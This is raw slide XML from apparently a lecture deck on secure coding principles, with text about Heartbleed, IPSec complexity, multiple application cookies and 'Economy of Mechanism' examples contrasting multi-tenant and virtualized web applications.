            <a:r>
              <a:rPr sz="1799" spc="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might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allow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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5"/>
              </a:rPr>
              <a:t>hijack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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5"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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5"/>
              </a:rPr>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0462C1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId15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of another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user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of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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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service.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" u="sng" baseline="25462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6"/>
              </a:rPr>
              <a:t>[22]</a:t>
            </a:r>
            <a:endParaRPr sz="1799" baseline="25462">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="38089" marR="226627" defTabSz="914126"/>
            <a:r>
              <a:rPr sz="1799" spc="-25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>At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its</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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disclosure,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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some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17%</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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half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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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million</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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of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the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Internet's</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="4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7"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" u="sng" spc="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7"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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7"/>
              </a:rPr>
              <a:t>servers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-395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certified</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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by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8"/>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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8"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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8"/>
              </a:rPr>
              <a:t>authorities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0462C1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId18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were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believed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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have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been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vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="2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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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attack.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" u="sng" spc="-15" baseline="25462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9"/>
              </a:rPr>
              <a:t>[23]</a:t>
            </a:r>
            <a:endParaRPr sz="1799" baseline="25462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46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4284118" y="6561781"/>
            <a:ext cx="5957923" cy="2339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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="1809"/>
              </a:lnSpc>
            </a:pP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Explantion</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="5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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="4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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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  <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Heartbleed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50380" y="3127454"/>
            <a:ext cx="391693" cy="391058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2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr sz="2399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84118" y="6230398"/>
            <a:ext cx="4055958" cy="29964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Cartoon</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>courtesy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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  <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>of:h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</a:rPr>
              <a:t>ttp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>://xkcd.com/1354/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75138" y="1813981"/>
            <a:ext cx="2605360" cy="3524094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30622" y="354369"/>
          <a:ext cx="11047392" cy="1878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2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87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2E5496"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="9525">
                      <a:solidFill>
                        <a:srgbClr val="E7E6E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0170" marR="5554345">
                        <a:lnSpc>
                          <a:spcPts val="2700"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="340"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2500" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E5496"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Common</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E549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00" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E5496"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Secure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E549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00" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E5496"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Coding</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="30" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E549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00" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E5496"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Principles </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="-765" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E549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00" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E5496"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Economy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E549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00" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E5496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2500" spc="10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E549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00" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E5496"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Mechanism</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="45" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E549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00" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E5496"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E549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00" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="2E5496"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Example</a:t>
                      </a:r>
                      <a:endParaRPr sz="2500">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="43169" marB="0">
                    <a:lnL w="28575">
                      <a:solidFill>
                        <a:srgbClr val="2E5496"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="2E5496"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="2E549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0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7E6E6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="2E5496"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="9525">
                      <a:solidFill>
                        <a:srgbClr val="E7E6E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2E5496"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="9525">
                      <a:solidFill>
                        <a:srgbClr val="E7E6E6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="2E549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7E6E6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="28575">
                      <a:solidFill>
                        <a:srgbClr val="2E5496"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="28575">
                      <a:solidFill>
                        <a:srgbClr val="2E549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809">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="377825" indent="-287020">
                        <a:lnSpc>
                          <a:spcPts val="1989"/>
                        </a:lnSpc>
                        <a:buClr>
                          <a:srgbClr val="00AFEF"/>
                        </a:buClr>
                        <a:buFont typeface="Arial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IPSEC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specification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has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over</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2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dozen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RFC's</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2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 has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hundreds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marL="377825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pages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Clr>
                          <a:srgbClr val="00AFEF"/>
                        </a:buClr>
                        <a:buFont typeface="Arial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Early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implementations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had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 many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serious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vulnerabilities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E7E6E6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="9525">
                      <a:solidFill>
                        <a:srgbClr val="E7E6E6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnB w="9525">
                      <a:solidFill>
                        <a:srgbClr val="E7E6E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7E6E6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnT w="28575">
                      <a:solidFill>
                        <a:srgbClr val="2E549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1130682" y="6450406"/>
            <a:ext cx="141568" cy="151284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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>30</a:t>
            </a:r>
            <a:endParaRPr sz="9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02819" y="6469604"/>
            <a:ext cx="4589854" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://arnoldzwicky.org/2012/08/07/comic-machines/&amp;ei=dvpLU6HdOuGSyQHJhYHoCA</a:t>
            </a:r>
            <a:endParaRPr sz="10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5192" y="2624537"/>
            <a:ext cx="8596296" cy="3108150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8598535" h="3108960">
                <a:moveTo>
                  <a:pt x="0" y="3108960"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8598408" y="3108960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8598408" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3108960"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9144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pPr defTabSz="914126"/>
            <a:endParaRPr sz="179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3911" y="2639265"/>
            <a:ext cx="7655471" cy="2646626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298995" indent="-286934" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00AFEF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="298995" algn="l"/>
                <a:tab pos="299630" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>An</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-2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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>multiple</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:endParaRPr sz="2399">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="812556" lvl="1" indent="-343432" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="812556" algn="l"/>
                <a:tab pos="813191" algn="l"/>
              </a:tabLst>
            </a:pP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One</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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authentication</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="812556" lvl="1" indent="-343432" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="812556" algn="l"/>
                <a:tab pos="813191" algn="l"/>
              </a:tabLst>
            </a:pP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One</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> for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billing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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for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connect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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time</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="812556" lvl="1" indent="-343432" defTabSz="914126">
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="812556" algn="l"/>
                <a:tab pos="813191" algn="l"/>
              </a:tabLst>
            </a:pP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One</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-2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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-3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tracking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>state</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="812556" lvl="1" indent="-343432" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="812556" algn="l"/>
                <a:tab pos="813191" algn="l"/>
              </a:tabLst>
            </a:pP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One</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999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maximum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connect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-2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time</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="812556" lvl="1" indent="-343432" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2384"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="812556" algn="l"/>
                <a:tab pos="813191" algn="l"/>
              </a:tabLst>
            </a:pP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One</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-2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15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>idle</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-2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time</a:t>
            </a:r>
            <a:endParaRPr sz="1999">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342797" indent="-342797" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2864"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00AFEF"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="342797" algn="l"/>
                <a:tab pos="356128" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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399" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>numerous</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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399" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>failures</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> features</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>due </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:endParaRPr sz="2399">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="1270" algn="ctr" defTabSz="914126"/>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>complexity</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-2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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> setting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-2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399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>processing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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399" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>various</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> cookies</a:t>
            </a:r>
            <a:endParaRPr sz="2399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48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552679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0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10" dirty="0"/>
              <a:t>Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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32267"/>
            <a:ext cx="10346535" cy="4743484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316770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web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application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starts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as a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multi-tenanted system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small numbers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user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groups;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each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group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treated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as independent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 others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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="81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Over time,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 number of groups and users, and demands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new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features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make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the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system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complex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that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it is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unreliable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increasing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threats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confidentiality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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="47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Solution: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virtualization;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give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each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user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group their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own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virtual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host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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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database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582120" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="84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Complexity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reduced;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costs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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are reduced;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improves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due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to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isolation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551649" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="81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Contrarian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view: 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SalesForce</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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uses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multi-tenanted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solution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their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own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design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(Force)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1508942" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="38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Incredibly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complex, but, their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customer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groups tend to be small,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so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virtualization might actually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more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complex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552679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0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10" dirty="0"/>
              <a:t>Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Example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32267"/>
